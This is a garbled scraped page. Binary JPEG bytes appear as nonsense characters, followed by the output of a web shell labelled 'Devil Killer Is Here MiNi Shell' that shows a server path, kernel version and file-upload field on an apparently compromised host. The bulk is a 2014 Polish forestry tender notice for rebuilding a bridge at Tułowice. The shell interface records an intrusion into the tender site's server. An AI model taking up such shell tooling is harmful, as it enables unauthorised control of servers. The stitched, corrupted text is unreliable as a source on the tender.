JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140224/63612-N-2014.html

<p class="kh_header"><b>Tułowice: Zaprojektowanie i przebudowa mostu na rzece Ścinawa Niemodlińska 
w ciągu drogi leśnej nr 1, oddz. 1m,  Leśnictwa Tułowice</b><br>
<b>Numer ogłoszenia: 63612 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe, Nadleśnictwo Tułowice , ul. Parkowa 14/14a, 49-130 Tułowice, woj. opolskie, tel. 0-77 4600109, faks 0-77 4600123.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http//www.katowice.lasy.gov.pl/tulowice</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Leśnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i przebudowa mostu na rzece Ścinawa Niemodlińska 
w ciągu drogi leśnej nr 1, oddz. 1m,  Leśnictwa Tułowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania inwestycyjnego w systemie zaprojektuj i wybuduj  pt. Zaprojektowanie i przebudowa mostu na rzece Ścinawa Niemodlińska w ciągu drogi leśnej nr 1, oddz. 1m,  Leśnictwa Tułowice
 
Przedsięwzięcie realizowane będzie etapowo. 
I i II etap obejmuje opracowanie dokumentacji projektowej wraz z pozyskaniem decyzji administracyjnych dla całości przedsięwzięcia  /opisanego w  PFU - załącznik  nr 12 do SIWZ / .  Efektem końcowym etapu II  przedsięwzięcia ma być uzyskanie pozwolenia na budowę.  Etap III i IV przedsięwzięcia obejmował będzie   
rozbiórkę mostu , wykonanie kładki  dla pieszych oraz  budowę w miejscu istniejącego nowego  stałego obiektu mostowego .
W zakresie projektowania:
Dokumentacja projektowa powinna obejmować uzyskanie :
-decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji 
-decyzji  o pozwoleniu wodno prawnym dla budowy obiektu mostowego
-decyzji o pozwoleniu na budowę.
Projekt powinien być uzgodniony z Wojewódzkim Konserwatorem Zabytków z uwagi na zlokalizowanie obiektu  mostowego  w strefie ochrony konserwatorskiej.
Zaprojektować należy obiekt stały z betonu o długości i świetle  obiektu wynikającego  z opracowanego operatu wodno prawnego.
Przedmiotem zamówienia jest zadanie polegające na opracowaniu dokumentacji projektowej obejmującej, pozyskanie wszelkich wymaganych przepisami decyzji administracyjnych z uwzględnieniem wykonania robót  budowlanych obejmujących zakres opisany w  PFU.
Dokumentację techniczną należy opracować z podziałem na części  umożliwiające etapowanie robót   budowlanych.
W zakresie robót budowlanych:
Planuje się przebudowę istniejącego obiektu mostowego  stalowo drewnianego  na most betonowy wraz z niezbędnymi robotami na dojazdach.
Na etapie budowy Wykonawca zapewni nadzór autorski Projektanta zgodnie 
z wymogami Prawa Budowlanego.
Po zakończeniu budowy mostu wykonawca uzyska pozwolenie na użytkowanie.
Podstawowe  parametry  techniczne mostu  po przebudowie :
Most /działka Nr  1/21, 1/24/ - oddział  1m, Leśnictwa Tułowice  w ciągu drogi leśnej nr 1
-Długość mostu ustalona na podstawie opracowanego i zatwierdzonego operatu  
 wodno prawnego
-Światło poziome i pionowe mostu ustalona na podstawie opracowanego 
 i zatwierdzonego operatu wodno prawnego
-Szerokość jezdni - 5,50 m
-Opaski bezpieczeństwa /chodniki/ - 2 x 0,50 m
-Nośność mostu - klasa C wg PN-85/S-10030  /30 ton/
Zakres  prac  objętych zamówieniem :
a/ opracowanie dokumentacji technicznej /projektu budowlanego, wykonawczego, specyfikacji technicznych oraz innych opracowań wymaganych do realizacji celu 
w tym przede wszystkim:
-Projektu branży mostowej
-Mapa do celów projektowych w skali 1 : 500.
-Dokumentacja geologiczno-inżynierska z geotechnicznymi warunkami posadowienia 
 obiektów budowlanych
-Operat wodno - prawny
-Projekt zasilania zaplecza budowy w energię elektryczną oraz wskazaniem punktu 
 poboru wody.
-Specyfikacje techniczne wykonania i odbioru robót budowlanych.
-Aktualizacja podkładów geodezyjnych i uzyskanie map do celów projektowych.
-Przygotowanie wniosku o decyzję o pozwoleniu na budowę 
-Uzyskanie  wszelkich  niezbędnych  opinii,  uzgodnień  i  decyzji administracyjnych,
-Opracowanie informacji BIOZ,
b/wykonanie robót budowlanych:
-prace przygotowawcze i rozbiórkowe wraz z wykonaniem kładki dla pieszych
-roboty ziemne
-wykonanie fundamentów
-wykonanie ustroju nośnego
-roboty wykończeniowe i porządkowe
-wszelkie inne prace wynikające z przyjętych rozwiązań projektowych opracowanej 
  przez Wykonawcę dokumentacji projektowej
-pełnienie nadzoru autorskiego
-sporządzenie operatu kolaudacyjnego
-przygotowanie kompletnego wniosku o wydanie pozwolenia na użytkowanie wraz   
 ze skutecznym złożeniem wniosku i przygotowanie materiałów wraz ze zgłoszeniem 
 zakończenia robót budowlanych.
Realizacja przedmiotu zamówienia wymaga:
a/ opracowania i przedstawienia Zamawiającemu do zatwierdzenia Specyfikacji 
 Technicznych na wszystkie  elementy realizowanych robót oraz opracowania 
 harmonogramu robót i harmonogramu płatności,
b/ realizacji robót w oparciu o projekty wykonawcze zatwierdzone przez 
 Zamawiającego
c/ prowadzenia   pomiarów  kontrolnych  i  badań   laboratoryjnych  zgodnie  
    z wymogami Specyfikacji  Technicznych /ST/ i prowadzenia dziennika budowy 
   i wykonywania obmiarów ilości zamawianych robót,
d/   utrzymanie nawierzchni jezdni na terenie bezpośrednio przylegającym do  
 obszaru budowy i w stanie zapewniającym bezpieczny ruch pojazdów od daty  
 przejęcia terenu budowy i oddanie jej w stanie nie gorszym  od przejętego ,
e/ sporządzenia inwentaryzacji geodezyjnej powykonawczej i uzyskanie jej 
 przyjęcia do właściwego zasobu geodezyjnego,
f/ przygotowania dokumentacji powykonawczej oraz skutecznego zgłoszenia  
 zakończenia robót budowlanych i uzyskania pozwolenia na użytkowanie,
g/ przygotowania rozliczenia końcowego robót i sporządzania operatu  
 kolaudacyjnego, który ma zawierać m.in.: 
umowę, ofertę, umowy z podwykonawcami, harmonogram, wyceniony wykaz elementów rozliczeniowych, protokoły odbioru robót ulegających zakryciu i zanikających, polisę ubezpieczeniową, protokół przekazania placu budowy, pismo o powołaniu Komisji Odbioru, badania materiałów, recepty, wyniki pomiarów, wyniki 
badań laboratoryjnych, deklaracje zgodności materiałów, sprawozdanie techniczne Wykonawcy, opinię technologiczną na podstawie wyników badań i pomiarów, geodezyjną inwentaryzację powykonawczą, rozliczenie finansowe, protokół odbioru końcowego robót, oświadczenie kierownika budowy o wykonaniu robót zgodnie z przepisami,
h/ sprawowania nadzoru autorskiego nad realizowanymi robotami,
Realizacja powyższego zakresu robót winna być wykonana w oparciu o obowiązujące przepisy /w tym w szczególności przepisy Prawa Budowlanego/ przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy oraz przez osoby o odpowiednich kwalifikacjach zawodowych  i doświadczeniu  zawodowym opisanych  w Specyfikacji Istotnych Warunków Zamówienia oraz Programie Funkcjonalno Użytkowym /zał. nr 12/. Zamawiający ustanowi nadzór inwestorski nad wykonaniem wszystkich robót objętych zadaniem.
1. Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej 
   i wykonanie robót budowlanych. 
2.Zakres przedmiotu zamówienia w zakresie dokumentacji projektowej obejmuje:

2.1. Opracowanie projektu budowlanego  oraz uzyskanie pozwolenia na budowę. Ww. dokumentację należy opracować w 5 egzemplarzach oraz przekazać Zamawiającemu w wersji elektronicznej na płycie CD (DVD) przeznaczonej do komputerów klasy PC
2.2. Opracowanie projektów wykonawczych  należy opracować w 5 egzemplarzach oraz przekazać Zamawiającemu w wersji elektronicznej na płycie CD (DVD) przeznaczonej do komputerów klasy PC.
2.3. Opracowanie specyfikacji technicznych wykonania i odbioru robót  należy opracować w 2 egzemplarzach oraz przekazać Zamawiającemu w wersji elektronicznej na płycie CD (DVD) przeznaczonej do komputerów klasy PC. 
2.4. Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ). Wyżej wymienioną dokumentację należy opracować w 2 egzemplarzach oraz przekazać Zamawiającemu w wersji elektronicznej na płycie CD (DVD) przeznaczonej do komputerów klasy PC. 
Opracowanie informacji dotyczącej  BIOZ  zgodnie  z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy  dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego z dnia 02.09.2004 (Dz. U.  z 2004 nr 202, poz. 2072 z późniejszymi zmianami). 
Dokumentację projektową należy wykonać w zakresie zgodnym z:
a/ Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami),
b/ Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389/.
Uwagi szczegółowe:
a/ Przed przystąpieniem do opracowania projektu budowlanego Wykonawca przedstawi Zamawiającemu do zatwierdzenia koncepcję programowo-przestrzenną. 
b/Do projektu budowlanego należy dołączyć oświadczenia projektanta o kompletności projektu budowlanego i jego zgodności z obowiązującymi przepisami prawa i normami,
c/Na wszystkie roboty budowlane w opracowanej dokumentacji projektowej należy uzyskać decyzję pozwolenia na budowę,
d/Przed złożeniem wniosku o wydanie pozwolenia na budowę, projekt budowlany podlega zatwierdzeniu przez Zamawiającego. Czas niezbędny na sprawdzenie przez Zamawiającego projektu budowlanego wynosi 30 dni roboczych.
Każdy z Wykonawców może dokonać wizji lokalnej na terenie budowy celem sprawdzenia warunków placu budowy oraz warunków związanych z opracowaniem dokumentacji   projektowej oraz wykonaniem przyszłych robót budowlanych.  Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z należytą starannością, zgodnie z obowiązującymi normami i przepisami prawa, zasadami współczesnej wiedzy technicznej i uzgodnieniami dokonanymi w trakcie realizacji robót. Wykonawca dostarcza wszystkie materiały niezbędne do wykonania zamówienia. Wszystkie zakupione przez Wykonawcę materiały powinny być nowe oraz powinny posiadać zaświadczenia, o jakości lub atesty oraz odpowiadać 
jakościowym i gatunkowym wymaganiom określonym w specyfikacji technicznej wykonania i odbioru robót.
Uwaga: Wskazane w dokumentacji przetargowej nazwy zastosowanych materiałów, urządzeń, znaków towarowych, patentów lub ich pochodzenie, należy rozumieć jako spełnienie wymaganych parametrów technicznych i standardów jakościowych o parametrach pożądanych przez Zamawiającego.
Wykonawca udzieli gwarancji na wszystkie prace budowlane zgodnie z deklaracją zawartą w formularzu ofertowym, a na materiały i urządzenia zgodnie z kartą gwarancyjną producenta. Zamawiający wymaga aby użyte materiały i zamontowane urządzenia były w pierwszym gatunku jakościowym z jak najdłuższą gwarancją producenta materiałów i urządzeń.
Wymagania stawiane Wykonawcy:
a/Wykonawca odpowiedzialny jest za jakość oraz zgodność opracowanej dokumentacji projektowej oraz przyszłych robót budowlanych z warunkami technicznymi i jakościowymi opisanymi dla niniejszego przedmiotu zamówienia 
w Programie Funkcjonalno - Użytkowym, jak również zgodnie z obowiązującymi przepisami prawa budowlanego, przepisami szczegółowymi i wykonawczymi oraz sztuką budowlaną.
b/Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
c/Prace budowlane i rzemieślnicze winne być wykonane zgodnie z zasadami sztuki budowlanej oraz obowiązującymi w tym zakresie przepisami prawa i normami.
d/Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
e/Wszystkie ustalenia i decyzje dotyczące wykonywania przedmiotu zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
f/Po zakończeniu robót budowlanych, Wykonawca zobowiązany jest do uporządkowania terenu na którym były prowadzone prace budowlane..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.31.42-6, 45.23.32.23-8, 45.11.12.00-0, 45.20.00.00-9, 71.32.20.00-1, 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta dla całego zadania musi być zabezpieczona wadium w wysokości :  
    15 000,00 zł (słownie złotych:  piętnaście  tysięcy  gr. 00/100 ). 
2. Wadium może być wniesione w następujących formach, w zależności od wyboru 
    wykonawcy:
    - pieniądzu; 
    - poręczeniach bankowych lub poręczeniach spółdzielczej kasy  
       oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze 
       poręczeniem pieniężnym; 
    - gwarancjach bankowych; 
    - gwarancjach ubezpieczeniowych; 
    - poręczeniach udzielanych przez podmioty o których mowa w art. 6 b ust. 5  
       pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji 
       Rozwoju Przedsiębiorczości. 
3.Wadium w formie pieniężnej należy wpłacić przelewem  na rachunek bankowy Zamawiającego BGZ S.A. 58 20 30 0045 1110 0000 0083 6850 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. 
4.Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości należy załączyć kserokopię do oferty a oryginał przed terminem składania ofert zdeponować w kasie Nadleśnictwa . Z treści gwarancji 
/poręczenia/ musi jednoznacznie wynikać,  jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego /upełnomocnionego/ przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny /z podaniem imienia i nazwiska/. Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych. 
5.Wadium musi być wniesione przed terminem składania ofert tj. do 12.03.2014 r. do godz. 9:00 .
6.Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym wyżej terminie tj. do 12.03.2014 r. do godz.9:00 /godzina składania ofert/-znajdzie się na rachunku bankowym Zamawiającego . 
7.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta  zostanie uznana za odrzuconą. 
8.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza .
9.Wykonawcy , którego oferta została wybrana jako najkorzystniejsza,zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego .
10.Zamawiający żąda ponownie wniesienia wadium przez Wykonawcę, któremu zwrócono wadium , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta  została wybrana jako najkorzystniejsza .    
Wykonawca wnosi wadium w terminie  określonym przez Zamawiającego.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli :
    a/Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 
      ustawy Pzp, nie złożył dokumentów lub oświadczeń, lub pełnomocnictw, chyba 
      że udowodni , że wynika to z przyczyn nie leżących po jego stronie.  
    b/Wykonawca, którego oferta została wybrana odmówił podpisania umowy  
       w sprawie zamówienia publicznego na warunkach określonych w ofercie;
    c/Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
       z przyczyn leżących po stronie Wykonawcy.   
12.Pozostałe warunki dotyczące wadium - zgodnie z art.45 i 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności , jeżeli przepisy prawa nakładają obowiązek ich posiadania:
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia / art.22 ust.1 ustawy Pzp/-zał. Nr 2 do SIWZ oraz oświadczenie 
o posiadanych uprawnieniach - zał. Nr 5a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia tj.  wykonawca wykaże, że w okresie ostatnich 
pięciu latach  przed upływem terminu składania ofert, a jeżeli okres prowadzenia   
działalności jest krótszy-w tym okresie zrealizowano co najmniej dwa zamówienia 
dotyczące budowy mostów  przy czym wartość każdego zamówienia nie może być 
mniejsza niż 350 000 zł brutto z podaniem ich rodzaju  i wartości, daty i miejsca  
wykonania oraz załączeniem dokumentu  potwierdzającego, że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone. 
W zakresie warunku wykonawca wykaże również , że w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowano  minimum dwie dokumentacje projektowe o wartości nie mniejszej niż 50.000 zł brutto obejmującej przebudowę lub budowę obiektu mostowego z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi  zostały wykonane zgodnie z zasadami sztuki projektowania i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnymi za kierowanie robotami budowlanymi i pracami projektowymi oraz posiadającymi wymagane kwalifikacje zawodowe i wykształcenie, niezbędne do wykonywania zamówienia, tj. :
a/Kierownik Zespołu Projektowego: osoba z uprawnieniami budowlanymi bez ograniczeń do projektowania w specjalności  mostowej lub odpowiadającymi im równoważnymi uprawnieniami ww. specjalności. Kierownik zespołu projektowego posiadać musi ponadto doświadczenie w zakresie wykonania lub kierowania zespołem projektowym, który opracował  minimum dwie  dokumentacje projektowe -w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie -  obiektów zgodnych z przedmiotem zamówienia opisanym w § 3 SIWZ , dla których zostało wydane  przewidziane prawem pozwolenie na budowę. 
b/Kierownik budowy: uprawnienia do kierowania robotami budowlanymi 
  w specjalności mostowej bez ograniczeń lub odpowiadającymi im równoważnymi 
  uprawnieniami ww. specjalności. Wymagane minimum dziesięcioletnie 
  doświadczenie, jako kierownik budowy.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w § 6.ppkt 1.3. SIWZ. 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. 
Uwaga:  Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konferencji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane /Dz. U. z 2006 r. nr 156, poz. 1118 z późn. zmianami/ oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej /Dz. U. z 2008 r.  nr 63 poz. 394/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia tj.  wykonawca wykaże, że w okresie ostatnich 
pięciu latach  przed upływem terminu składania ofert, a jeżeli okres prowadzenia   
działalności jest krótszy-w tym okresie zrealizowano co najmniej dwa zamówienia 
dotyczące budowy mostów  przy czym wartość każdego zamówienia nie może być 
mniejsza niż 350 000 zł brutto z podaniem ich rodzaju  i wartości, daty i miejsca  
wykonania oraz załączeniem dokumentu  potwierdzającego, że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone. 
W zakresie warunku wykonawca wykaże również , że w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowano  minimum dwie dokumentacje projektowe o wartości nie mniejszej niż 50.000 zł brutto obejmującej przebudowę lub budowę obiektu mostowego z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi  zostały wykonane zgodnie z zasadami sztuki projektowania i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że jest ubezpieczony i przedstawi opłaconą polisę, a  w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia o wartości co najmniej 700 000,00 zł., 
oraz znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, co wykaże  informacją z banku lub spółdzielczej kasy oszczędnościowej potwierdzającej wysokość  posiadanych  środków  finansowych lub  zdolność  kredytową  w wysokości minimum 300.000,00zł wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty   
dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
